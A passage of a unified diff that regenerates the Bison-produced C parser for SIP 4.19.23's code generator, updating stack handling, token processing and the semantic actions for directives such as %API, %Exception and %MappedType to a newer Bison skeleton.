yyptr) +- goto yyexhaustedlab; +- YYSTACK_RELOCATE (yyss); +- YYSTACK_RELOCATE (yyvs); +- ++ yy_state_t *yyss1 = yyss; ++ union yyalloc *yyptr = ++ YY_CAST (union yyalloc *, ++ YYSTACK_ALLOC (YY_CAST (YYSIZE_T, YYSTACK_BYTES (yystacksize)))); ++ if (! yyptr) ++ YYNOMEM; ++ YYSTACK_RELOCATE (yyss_alloc, yyss); ++ YYSTACK_RELOCATE (yyvs_alloc, yyvs); + # undef YYSTACK_RELOCATE +- if (yyss1 != yyssa) +- YYSTACK_FREE (yyss1); ++ if (yyss1 != yyssa) ++ YYSTACK_FREE (yyss1); + } + # endif +-#endif /* no yyoverflow */ + + yyssp = yyss + yysize - 1; + yyvsp = yyvs + yysize - 1; + +- +- YYDPRINTF ((stderr, "Stack size increased to %lu\n", +- (unsigned long int) yystacksize)); ++ YY_IGNORE_USELESS_CAST_BEGIN ++ YYDPRINTF ((stderr, "Stack size increased to %ld\n", ++ YY_CAST (long, yystacksize))); ++ YY_IGNORE_USELESS_CAST_END + + if (yyss + yystacksize - 1 <= yyssp) +- YYABORT; ++ YYABORT; + } ++#endif /* !defined yyoverflow && !defined YYSTACK_RELOCATE */ + +- YYDPRINTF ((stderr, "Entering state %d\n", yystate)); ++ ++ if (yystate == YYFINAL) ++ YYACCEPT; + + goto yybackup; + ++ + /*-----------. + | yybackup. | + `-----------*/ + yybackup: +- + /* Do appropriate processing given the current state. Read a +- look-ahead token if we need one and don't already have one. */ ++ lookahead token if we need one and don't already have one. */ + +- /* First try to decide what to do without reference to look-ahead token. */ ++ /* First try to decide what to do without reference to lookahead token. */ + yyn = yypact[yystate]; +- if (yyn == YYPACT_NINF) ++ if (yypact_value_is_default (yyn)) + goto yydefault; + +- /* Not known => get a look-ahead token if don't already have one. */ ++ /* Not known => get a lookahead token if don't already have one. */ + +- /* YYCHAR is either YYEMPTY or YYEOF or a valid look-ahead symbol. */ ++ /* YYCHAR is either empty, or end-of-input, or a valid lookahead. 
*/ + if (yychar == YYEMPTY) + { +- YYDPRINTF ((stderr, "Reading a token: ")); +- yychar = YYLEX; ++ YYDPRINTF ((stderr, "Reading a token\n")); ++ yychar = yylex (); + } + + if (yychar <= YYEOF) + { +- yychar = yytoken = YYEOF; ++ yychar = YYEOF; ++ yytoken = YYSYMBOL_YYEOF; + YYDPRINTF ((stderr, "Now at end of input.\n")); + } ++ else if (yychar == YYerror) ++ { ++ /* The scanner already issued an error message, process directly ++ to error recovery. But do not keep the error token as ++ lookahead, it is too special and may lead us to an endless ++ loop in error recovery. */ ++ yychar = YYUNDEF; ++ yytoken = YYSYMBOL_YYerror; ++ goto yyerrlab1; ++ } + else + { + yytoken = YYTRANSLATE (yychar); +@@ -2976,30 +2575,26 @@ yybackup: + yyn = yytable[yyn]; + if (yyn <= 0) + { +- if (yyn == 0 || yyn == YYTABLE_NINF) +- goto yyerrlab; ++ if (yytable_value_is_error (yyn)) ++ goto yyerrlab; + yyn = -yyn; + goto yyreduce; + } + +- if (yyn == YYFINAL) +- YYACCEPT; +- + /* Count tokens shifted since error; after three, turn off error + status. */ + if (yyerrstatus) + yyerrstatus--; + +- /* Shift the look-ahead token. */ ++ /* Shift the lookahead token. */ + YY_SYMBOL_PRINT ("Shifting", yytoken, &yylval, &yylloc); +- +- /* Discard the shifted token unless it is eof. */ +- if (yychar != YYEOF) +- yychar = YYEMPTY; +- + yystate = yyn; ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN + *++yyvsp = yylval; ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + ++ /* Discard the shifted token. */ ++ yychar = YYEMPTY; + goto yynewstate; + + +@@ -3014,14 +2609,14 @@ yydefault: + + + /*-----------------------------. +-| yyreduce -- Do a reduction. | ++| yyreduce -- do a reduction. | + `-----------------------------*/ + yyreduce: + /* yyn is the number of a rule to reduce with. */ + yylen = yyr2[yyn]; + + /* If YYLEN is nonzero, implement the default value of the action: +- `$$ = $1'. ++ '$$ = $1'. + + Otherwise, the following line sets YYVAL to garbage. 
+ This behavior is undocumented and Bison +@@ -3034,9 +2629,9 @@ yyreduce: + YY_REDUCE_PRINT (yyn); + switch (yyn) + { +- case 4: +-#line 578 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 4: /* $@1: %empty */ ++#line 579 "parser.y" ++ { + /* + * We don't do these in parserEOF() because the parser is reading + * ahead and that would be too early. +@@ -3053,11 +2648,12 @@ yyreduce: + previousFile = NULL; + } + } ++#line 2652 "../parser.c" + break; + +- case 55: +-#line 648 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 55: /* nsstatement: typehdrcode */ ++#line 649 "parser.y" ++ { + if (notSkipping()) + { + classDef *scope = currentScope(); +@@ -3065,203 +2661,224 @@ yyreduce: + if (scope == NULL) + yyerror("%TypeHeaderCode can only be used in a namespace, class or mapped type"); + +- appendCodeBlock(&scope->iff->hdrcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(&scope->iff->hdrcode, (yyvsp[0].codeb)); + } + } ++#line 2668 "../parser.c" + break; + +- case 56: +-#line 661 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 56: /* defdocstringfmt: TK_DEFDOCSTRFMT defdocstringfmt_args */ ++#line 662 "parser.y" ++ { + if (notSkipping()) +- currentModule->defdocstringfmt = convertFormat((yyvsp[(2) - (2)].defdocstringfmt).name); ++ currentModule->defdocstringfmt = convertFormat((yyvsp[0].defdocstringfmt).name); + } ++#line 2677 "../parser.c" + break; + +- case 57: +-#line 667 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 57: /* defdocstringfmt_args: TK_STRING_VALUE */ ++#line 668 "parser.y" ++ { + resetLexerState(); + +- (yyval.defdocstringfmt).name = (yyvsp[(1) - (1)].text); ++ (yyval.defdocstringfmt).name = (yyvsp[0].text); + } ++#line 2687 "../parser.c" + break; + +- case 58: +-#line 672 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringfmt) = (yyvsp[(2) - (3)].defdocstringfmt); ++ case 58: /* defdocstringfmt_args: '(' defdocstringfmt_arg_list ')' */ ++#line 673 "parser.y" ++ { ++ (yyval.defdocstringfmt) = (yyvsp[-1].defdocstringfmt); + 
} ++#line 2695 "../parser.c" + break; + +- case 60: +-#line 678 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringfmt) = (yyvsp[(1) - (3)].defdocstringfmt); ++ case 60: /* defdocstringfmt_arg_list: defdocstringfmt_arg_list ',' defdocstringfmt_arg */ ++#line 679 "parser.y" ++ { ++ (yyval.defdocstringfmt) = (yyvsp[-2].defdocstringfmt); + +- switch ((yyvsp[(3) - (3)].defdocstringfmt).token) ++ switch ((yyvsp[0].defdocstringfmt).token) + { +- case TK_NAME: (yyval.defdocstringfmt).name = (yyvsp[(3) - (3)].defdocstringfmt).name; break; ++ case TK_NAME: (yyval.defdocstringfmt).name = (yyvsp[0].defdocstringfmt).name; break; + } + } ++#line 2708 "../parser.c" + break; + +- case 61: +-#line 688 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 61: /* defdocstringfmt_arg: TK_NAME '=' TK_STRING_VALUE */ ++#line 689 "parser.y" ++ { + (yyval.defdocstringfmt).token = TK_NAME; + +- (yyval.defdocstringfmt).name = (yyvsp[(3) - (3)].text); ++ (yyval.defdocstringfmt).name = (yyvsp[0].text); + } ++#line 2718 "../parser.c" + break; + +- case 62: +-#line 695 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 62: /* defdocstringsig: TK_DEFDOCSTRSIG defdocstringsig_args */ ++#line 696 "parser.y" ++ { + if (notSkipping()) +- currentModule->defdocstringsig = convertSignature((yyvsp[(2) - (2)].defdocstringsig).name); ++ currentModule->defdocstringsig = convertSignature((yyvsp[0].defdocstringsig).name); + } ++#line 2727 "../parser.c" + break; + +- case 63: +-#line 701 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 63: /* defdocstringsig_args: TK_STRING_VALUE */ ++#line 702 "parser.y" ++ { + resetLexerState(); + +- (yyval.defdocstringsig).name = (yyvsp[(1) - (1)].text); ++ (yyval.defdocstringsig).name = (yyvsp[0].text); + } ++#line 2737 "../parser.c" + break; + +- case 64: +-#line 706 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringsig) = (yyvsp[(2) - (3)].defdocstringsig); ++ case 64: /* defdocstringsig_args: '(' defdocstringsig_arg_list ')' */ ++#line 707 
"parser.y" ++ { ++ (yyval.defdocstringsig) = (yyvsp[-1].defdocstringsig); + } ++#line 2745 "../parser.c" + break; + +- case 66: +-#line 712 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defdocstringsig) = (yyvsp[(1) - (3)].defdocstringsig); ++ case 66: /* defdocstringsig_arg_list: defdocstringsig_arg_list ',' defdocstringsig_arg */ ++#line 713 "parser.y" ++ { ++ (yyval.defdocstringsig) = (yyvsp[-2].defdocstringsig); + +- switch ((yyvsp[(3) - (3)].defdocstringsig).token) ++ switch ((yyvsp[0].defdocstringsig).token) + { +- case TK_NAME: (yyval.defdocstringsig).name = (yyvsp[(3) - (3)].defdocstringsig).name; break; ++ case TK_NAME: (yyval.defdocstringsig).name = (yyvsp[0].defdocstringsig).name; break; + } + } ++#line 2758 "../parser.c" + break; + +- case 67: +-#line 722 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 67: /* defdocstringsig_arg: TK_NAME '=' TK_STRING_VALUE */ ++#line 723 "parser.y" ++ { + (yyval.defdocstringsig).token = TK_NAME; + +- (yyval.defdocstringsig).name = (yyvsp[(3) - (3)].text); ++ (yyval.defdocstringsig).name = (yyvsp[0].text); + } ++#line 2768 "../parser.c" + break; + +- case 68: +-#line 729 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 68: /* defencoding: TK_DEFENCODING defencoding_args */ ++#line 730 "parser.y" ++ { + if (notSkipping()) + { +- if ((currentModule->encoding = convertEncoding((yyvsp[(2) - (2)].defencoding).name)) == no_type) ++ if ((currentModule->encoding = convertEncoding((yyvsp[0].defencoding).name)) == no_type) + yyerror("The %DefaultEncoding name must be one of \"ASCII\", \"Latin-1\", \"UTF-8\" or \"None\""); + } + } ++#line 2780 "../parser.c" + break; + +- case 69: +-#line 738 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 69: /* defencoding_args: TK_STRING_VALUE */ ++#line 739 "parser.y" ++ { + resetLexerState(); + +- (yyval.defencoding).name = (yyvsp[(1) - (1)].text); ++ (yyval.defencoding).name = (yyvsp[0].text); + } ++#line 2790 "../parser.c" + break; + +- case 70: +-#line 743 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defencoding) = (yyvsp[(2) - (3)].defencoding); ++ case 70: /* defencoding_args: '(' defencoding_arg_list ')' */ ++#line 744 "parser.y" ++ { ++ (yyval.defencoding) = (yyvsp[-1].defencoding); + } ++#line 2798 "../parser.c" + break; + +- case 72: +-#line 749 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defencoding) = (yyvsp[(1) - (3)].defencoding); ++ case 72: /* defencoding_arg_list: defencoding_arg_list ',' defencoding_arg */ ++#line 750 "parser.y" ++ { ++ (yyval.defencoding) = (yyvsp[-2].defencoding); + +- switch ((yyvsp[(3) - (3)].defencoding).token) ++ switch ((yyvsp[0].defencoding).token) + { +- case TK_NAME: (yyval.defencoding).name = (yyvsp[(3) - (3)].defencoding).name; break; ++ case TK_NAME: (yyval.defencoding).name = (yyvsp[0].defencoding).name; break; + } + } ++#line 2811 "../parser.c" + break; + +- case 73: +-#line 759 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 73: /* defencoding_arg: TK_NAME '=' TK_STRING_VALUE */ ++#line 760 "parser.y" ++ { + (yyval.defencoding).token = TK_NAME; + +- (yyval.defencoding).name = (yyvsp[(3) - (3)].text); ++ (yyval.defencoding).name = (yyvsp[0].text); + } ++#line 2821 "../parser.c" + break; + +- case 74: +-#line 766 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 74: /* plugin: TK_PLUGIN plugin_args */ ++#line 767 "parser.y" ++ { + /* + * Note that %Plugin is internal in SIP v4. The current thinking + * is that it won't be needed for SIP v5. 
+ */ + + if (notSkipping()) +- appendString(¤tSpec->plugins, (yyvsp[(2) - (2)].plugin).name); ++ appendString(¤tSpec->plugins, (yyvsp[0].plugin).name); + } ++#line 2835 "../parser.c" + break; + +- case 75: +-#line 777 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 75: /* plugin_args: TK_NAME_VALUE */ ++#line 778 "parser.y" ++ { + resetLexerState(); + +- (yyval.plugin).name = (yyvsp[(1) - (1)].text); ++ (yyval.plugin).name = (yyvsp[0].text); + } ++#line 2845 "../parser.c" + break; + +- case 76: +-#line 782 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.plugin) = (yyvsp[(2) - (3)].plugin); ++ case 76: /* plugin_args: '(' plugin_arg_list ')' */ ++#line 783 "parser.y" ++ { ++ (yyval.plugin) = (yyvsp[-1].plugin); + } ++#line 2853 "../parser.c" + break; + +- case 78: +-#line 788 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.plugin) = (yyvsp[(1) - (3)].plugin); ++ case 78: /* plugin_arg_list: plugin_arg_list ',' plugin_arg */ ++#line 789 "parser.y" ++ { ++ (yyval.plugin) = (yyvsp[-2].plugin); + +- switch ((yyvsp[(3) - (3)].plugin).token) ++ switch ((yyvsp[0].plugin).token) + { +- case TK_NAME: (yyval.plugin).name = (yyvsp[(3) - (3)].plugin).name; break; ++ case TK_NAME: (yyval.plugin).name = (yyvsp[0].plugin).name; break; + } + } ++#line 2866 "../parser.c" + break; + +- case 79: +-#line 798 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 79: /* plugin_arg: TK_NAME '=' TK_NAME_VALUE */ ++#line 799 "parser.y" ++ { + (yyval.plugin).token = TK_NAME; + +- (yyval.plugin).name = (yyvsp[(3) - (3)].text); ++ (yyval.plugin).name = (yyvsp[0].text); + } ++#line 2876 "../parser.c" + break; + +- case 80: +-#line 805 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].veh).name == NULL) ++ case 80: /* virterrorhandler: TK_VIRTERRORHANDLER veh_args codeblock */ ++#line 806 "parser.y" ++ { ++ if ((yyvsp[-1].veh).name == NULL) + yyerror("%VirtualErrorHandler must have a 'name' argument"); + + if (notSkipping()) +@@ -3270,7 +2887,7 @@ yyreduce: + + /* 
Check there isn't already a handler with the same name. */ + for (tailp = ¤tSpec->errorhandlers; (veh = *tailp) != NULL; tailp = &veh->next) +- if (strcmp(veh->name, (yyvsp[(2) - (3)].veh).name) == 0) ++ if (strcmp(veh->name, (yyvsp[-1].veh).name) == 0) + break; + + if (veh != NULL) +@@ -3278,8 +2895,8 @@ yyreduce: + + veh = sipMalloc(sizeof (virtErrorHandler)); + +- veh->name = (yyvsp[(2) - (3)].veh).name; +- appendCodeBlock(&veh->code, (yyvsp[(3) - (3)].codeb)); ++ veh->name = (yyvsp[-1].veh).name; ++ appendCodeBlock(&veh->code, (yyvsp[0].codeb)); + veh->mod = currentModule; + veh->index = -1; + veh->next = NULL; +@@ -3287,62 +2904,67 @@ yyreduce: + *tailp = veh; + } + } ++#line 2908 "../parser.c" + break; + +- case 81: +-#line 834 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 81: /* veh_args: TK_NAME_VALUE */ ++#line 835 "parser.y" ++ { + resetLexerState(); + +- (yyval.veh).name = (yyvsp[(1) - (1)].text); ++ (yyval.veh).name = (yyvsp[0].text); + } ++#line 2918 "../parser.c" + break; + +- case 82: +-#line 839 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.veh) = (yyvsp[(2) - (3)].veh); ++ case 82: /* veh_args: '(' veh_arg_list ')' */ ++#line 840 "parser.y" ++ { ++ (yyval.veh) = (yyvsp[-1].veh); + } ++#line 2926 "../parser.c" + break; + +- case 84: +-#line 845 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.veh) = (yyvsp[(1) - (3)].veh); ++ case 84: /* veh_arg_list: veh_arg_list ',' veh_arg */ ++#line 846 "parser.y" ++ { ++ (yyval.veh) = (yyvsp[-2].veh); + +- switch ((yyvsp[(3) - (3)].veh).token) ++ switch ((yyvsp[0].veh).token) + { +- case TK_NAME: (yyval.veh).name = (yyvsp[(3) - (3)].veh).name; break; ++ case TK_NAME: (yyval.veh).name = (yyvsp[0].veh).name; break; + } + } ++#line 2939 "../parser.c" + break; + +- case 85: +-#line 855 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 85: /* veh_arg: TK_NAME '=' TK_NAME_VALUE */ ++#line 856 "parser.y" ++ { + (yyval.veh).token = TK_NAME; + +- (yyval.veh).name = (yyvsp[(3) - (3)].text); ++ 
(yyval.veh).name = (yyvsp[0].text); + } ++#line 2949 "../parser.c" + break; + +- case 86: +-#line 862 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 86: /* api: TK_API api_args */ ++#line 863 "parser.y" ++ { + if (notSkipping()) + { + apiVersionRangeDef *avd; + +- if (findAPI(currentSpec, (yyvsp[(2) - (2)].api).name) != NULL) ++ if (findAPI(currentSpec, (yyvsp[0].api).name) != NULL) + yyerror("The API name in the %API directive has already been defined"); + +- if ((yyvsp[(2) - (2)].api).version < 1) ++ if ((yyvsp[0].api).version < 1) + yyerror("The version number in the %API directive must be greater than or equal to 1"); + + avd = sipMalloc(sizeof (apiVersionRangeDef)); + +- avd->api_name = cacheName(currentSpec, (yyvsp[(2) - (2)].api).name); +- avd->from = (yyvsp[(2) - (2)].api).version; ++ avd->api_name = cacheName(currentSpec, (yyvsp[0].api).name); ++ avd->from = (yyvsp[0].api).version; + avd->to = -1; + + avd->next = currentModule->api_versions; +@@ -3352,63 +2974,69 @@ yyreduce: + setIsUsedName(avd->api_name); + } + } ++#line 2978 "../parser.c" + break; + +- case 87: +-#line 888 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 87: /* api_args: TK_NAME_VALUE TK_NUMBER_VALUE */ ++#line 889 "parser.y" ++ { + resetLexerState(); + + deprecated("%API name and version number should be specified using the 'name' and 'version' arguments"); + +- (yyval.api).name = (yyvsp[(1) - (2)].text); +- (yyval.api).version = (yyvsp[(2) - (2)].number); ++ (yyval.api).name = (yyvsp[-1].text); ++ (yyval.api).version = (yyvsp[0].number); + } ++#line 2991 "../parser.c" + break; + +- case 88: +-#line 896 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.api) = (yyvsp[(2) - (3)].api); ++ case 88: /* api_args: '(' api_arg_list ')' */ ++#line 897 "parser.y" ++ { ++ (yyval.api) = (yyvsp[-1].api); + } ++#line 2999 "../parser.c" + break; + +- case 90: +-#line 902 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.api) = (yyvsp[(1) - (3)].api); ++ case 90: /* api_arg_list: 
api_arg_list ',' api_arg */ ++#line 903 "parser.y" ++ { ++ (yyval.api) = (yyvsp[-2].api); + +- switch ((yyvsp[(3) - (3)].api).token) ++ switch ((yyvsp[0].api).token) + { +- case TK_NAME: (yyval.api).name = (yyvsp[(3) - (3)].api).name; break; +- case TK_VERSION: (yyval.api).version = (yyvsp[(3) - (3)].api).version; break; ++ case TK_NAME: (yyval.api).name = (yyvsp[0].api).name; break; ++ case TK_VERSION: (yyval.api).version = (yyvsp[0].api).version; break; + } + } ++#line 3013 "../parser.c" + break; + +- case 91: +-#line 913 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 91: /* api_arg: TK_NAME '=' name_or_string */ ++#line 914 "parser.y" ++ { + (yyval.api).token = TK_NAME; + +- (yyval.api).name = (yyvsp[(3) - (3)].text); ++ (yyval.api).name = (yyvsp[0].text); + (yyval.api).version = 0; + } ++#line 3024 "../parser.c" + break; + +- case 92: +-#line 919 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 92: /* api_arg: TK_VERSION '=' TK_NUMBER_VALUE */ ++#line 920 "parser.y" ++ { + (yyval.api).token = TK_VERSION; + + (yyval.api).name = NULL; +- (yyval.api).version = (yyvsp[(3) - (3)].number); ++ (yyval.api).version = (yyvsp[0].number); + } ++#line 3035 "../parser.c" + break; + +- case 93: +-#line 927 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 93: /* exception: TK_EXCEPTION scopedname baseexception optflags exception_body */ ++#line 928 "parser.y" ++ { + if (notSkipping()) + { + static const char *annos[] = { +@@ -3420,20 +3048,20 @@ yyreduce: + exceptionDef *xd; + const char *pyname; + +- checkAnnos(&(yyvsp[(4) - (5)].optflags), annos); ++ checkAnnos(&(yyvsp[-1].optflags), annos); + + if (currentSpec->genc) + yyerror("%Exception not allowed in a C module"); + +- if ((yyvsp[(5) - (5)].exception).raise_code == NULL) ++ if ((yyvsp[0].exception).raise_code == NULL) + yyerror("%Exception must have a %RaiseCode sub-directive"); + +- pyname = getPythonName(currentModule, &(yyvsp[(4) - (5)].optflags), scopedNameTail((yyvsp[(2) - (5)].scpvalp))); ++ pyname = 
getPythonName(currentModule, &(yyvsp[-1].optflags), scopedNameTail((yyvsp[-3].scpvalp))); + + checkAttributes(currentSpec, currentModule, NULL, NULL, + pyname, FALSE); + +- xd = findException(currentSpec, (yyvsp[(2) - (5)].scpvalp), TRUE); ++ xd = findException(currentSpec, (yyvsp[-3].scpvalp), TRUE); + + if (xd->cd != NULL) + yyerror("%Exception name has already been seen as a class name - it must be defined before being used"); +@@ -3443,29 +3071,31 @@ yyreduce: + + /* Complete the definition. */ + xd->iff->module = currentModule; +- appendCodeBlock(&xd->iff->hdrcode, (yyvsp[(5) - (5)].exception).type_header_code); ++ appendCodeBlock(&xd->iff->hdrcode, (yyvsp[0].exception).type_header_code); + xd->pyname = pyname; +- xd->bibase = (yyvsp[(3) - (5)].exceptionbase).bibase; +- xd->base = (yyvsp[(3) - (5)].exceptionbase).base; +- appendCodeBlock(&xd->raisecode, (yyvsp[(5) - (5)].exception).raise_code); ++ xd->bibase = (yyvsp[-2].exceptionbase).bibase; ++ xd->base = (yyvsp[-2].exceptionbase).base; ++ appendCodeBlock(&xd->raisecode, (yyvsp[0].exception).raise_code); + +- if (getOptFlag(&(yyvsp[(4) - (5)].optflags), "Default", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[-1].optflags), "Default", bool_flag) != NULL) + currentModule->defexception = xd; + } + } ++#line 3085 "../parser.c" + break; + +- case 94: +-#line 974 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 94: /* baseexception: %empty */ ++#line 975 "parser.y" ++ { + (yyval.exceptionbase).bibase = NULL; + (yyval.exceptionbase).base = NULL; + } ++#line 3094 "../parser.c" + break; + +- case 95: +-#line 978 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 95: /* baseexception: '(' scopedname ')' */ ++#line 979 "parser.y" ++ { + exceptionDef *xd; + + (yyval.exceptionbase).bibase = NULL; +@@ -3473,13 +3103,13 @@ yyreduce: + + /* See if it is a defined exception. 
*/ + for (xd = currentSpec->exceptions; xd != NULL; xd = xd->next) +- if (compareScopedNames(xd->iff->fqcname, (yyvsp[(2) - (3)].scpvalp)) == 0) ++ if (compareScopedNames(xd->iff->fqcname, (yyvsp[-1].scpvalp)) == 0) + { + (yyval.exceptionbase).base = xd; + break; + } + +- if (xd == NULL && (yyvsp[(2) - (3)].scpvalp)->next == NULL && strncmp((yyvsp[(2) - (3)].scpvalp)->name, "SIP_", 4) == 0) ++ if (xd == NULL && (yyvsp[-1].scpvalp)->next == NULL && strncmp((yyvsp[-1].scpvalp)->name, "SIP_", 4) == 0) + { + /* See if it is a builtin exception. */ + +@@ -3560,7 +3190,7 @@ yyreduce: + char **cp; + + for (cp = builtins; *cp != NULL; ++cp) +- if (strcmp((yyvsp[(2) - (3)].scpvalp)->name + 4, *cp) == 0) ++ if (strcmp((yyvsp[-1].scpvalp)->name + 4, *cp) == 0) + { + (yyval.exceptionbase).bibase = *cp; + break; +@@ -3570,49 +3200,54 @@ yyreduce: + if ((yyval.exceptionbase).bibase == NULL && (yyval.exceptionbase).base == NULL) + yyerror("Unknown exception base type"); + } ++#line 3204 "../parser.c" + break; + +- case 96: +-#line 1085 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.exception) = (yyvsp[(2) - (4)].exception); ++ case 96: /* exception_body: '{' exception_body_directives '}' ';' */ ++#line 1086 "parser.y" ++ { ++ (yyval.exception) = (yyvsp[-2].exception); + } ++#line 3212 "../parser.c" + break; + +- case 98: +-#line 1091 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.exception) = (yyvsp[(1) - (2)].exception); ++ case 98: /* exception_body_directives: exception_body_directives exception_body_directive */ ++#line 1092 "parser.y" ++ { ++ (yyval.exception) = (yyvsp[-1].exception); + +- switch ((yyvsp[(2) - (2)].exception).token) ++ switch ((yyvsp[0].exception).token) + { +- case TK_RAISECODE: (yyval.exception).raise_code = (yyvsp[(2) - (2)].exception).raise_code; break; +- case TK_TYPEHEADERCODE: (yyval.exception).type_header_code = (yyvsp[(2) - (2)].exception).type_header_code; break; ++ case TK_RAISECODE: (yyval.exception).raise_code = 
(yyvsp[0].exception).raise_code; break; ++ case TK_TYPEHEADERCODE: (yyval.exception).type_header_code = (yyvsp[0].exception).type_header_code; break; + } + } ++#line 3226 "../parser.c" + break; + +- case 99: +-#line 1102 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 99: /* exception_body_directive: ifstart */ ++#line 1103 "parser.y" ++ { + (yyval.exception).token = TK_IF; + } ++#line 3234 "../parser.c" + break; + +- case 100: +-#line 1105 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 100: /* exception_body_directive: ifend */ ++#line 1106 "parser.y" ++ { + (yyval.exception).token = TK_END; + } ++#line 3242 "../parser.c" + break; + +- case 101: +-#line 1108 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 101: /* exception_body_directive: raisecode */ ++#line 1109 "parser.y" ++ { + if (notSkipping()) + { + (yyval.exception).token = TK_RAISECODE; +- (yyval.exception).raise_code = (yyvsp[(1) - (1)].codeb); ++ (yyval.exception).raise_code = (yyvsp[0].codeb); + } + else + { +@@ -3622,15 +3257,16 @@ yyreduce: + + (yyval.exception).type_header_code = NULL; + } ++#line 3261 "../parser.c" + break; + +- case 102: +-#line 1122 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 102: /* exception_body_directive: typehdrcode */ ++#line 1123 "parser.y" ++ { + if (notSkipping()) + { + (yyval.exception).token = TK_TYPEHEADERCODE; +- (yyval.exception).type_header_code = (yyvsp[(1) - (1)].codeb); ++ (yyval.exception).type_header_code = (yyvsp[0].codeb); + } + else + { +@@ -3640,18 +3276,20 @@ yyreduce: + + (yyval.exception).raise_code = NULL; + } ++#line 3280 "../parser.c" + break; + +- case 103: +-#line 1138 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 103: /* raisecode: TK_RAISECODE codeblock */ ++#line 1139 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 3288 "../parser.c" + break; + +- case 104: +-#line 1143 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 104: /* $@2: %empty */ ++#line 1144 
"parser.y" ++ { + if (notSkipping()) + { + static const char *annos[] = { +@@ -3667,16 +3305,17 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(3) - (3)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + +- currentMappedType = newMappedType(currentSpec, &(yyvsp[(2) - (3)].memArg), &(yyvsp[(3) - (3)].optflags)); ++ currentMappedType = newMappedType(currentSpec, &(yyvsp[-1].memArg), &(yyvsp[0].optflags)); + } + } ++#line 3314 "../parser.c" + break; + +- case 106: +-#line 1166 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 106: /* $@3: %empty */ ++#line 1167 "parser.y" ++ { + if (notSkipping()) + { + static const char *annos[] = { +@@ -3694,7 +3333,7 @@ yyreduce: + mappedTypeTmplDef *mtt; + ifaceFileDef *iff; + +- checkAnnos(&(yyvsp[(4) - (4)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + if (currentSpec->genc) + yyerror("%MappedType templates not allowed in a C module"); +@@ -3703,32 +3342,32 @@ yyreduce: + * Check the template arguments are basic types or simple + * names. + */ +- for (a = 0; a < (yyvsp[(1) - (4)].signature).nrArgs; ++a) ++ for (a = 0; a < (yyvsp[-3].signature).nrArgs; ++a) + { +- argDef *ad = &(yyvsp[(1) - (4)].signature).args[a]; ++ argDef *ad = &(yyvsp[-3].signature).args[a]; + + if (ad->atype == defined_type && ad->u.snd->next != NULL) + yyerror("%MappedType template arguments must be simple names"); + } + +- if ((yyvsp[(3) - (4)].memArg).atype != template_type) ++ if ((yyvsp[-1].memArg).atype != template_type) + yyerror("%MappedType template must map a template type"); + +- (yyvsp[(3) - (4)].memArg).u.td->fqname = fullyQualifiedName((yyvsp[(3) - (4)].memArg).u.td->fqname); ++ (yyvsp[-1].memArg).u.td->fqname = fullyQualifiedName((yyvsp[-1].memArg).u.td->fqname); + + /* Check a template hasn't already been provided. 
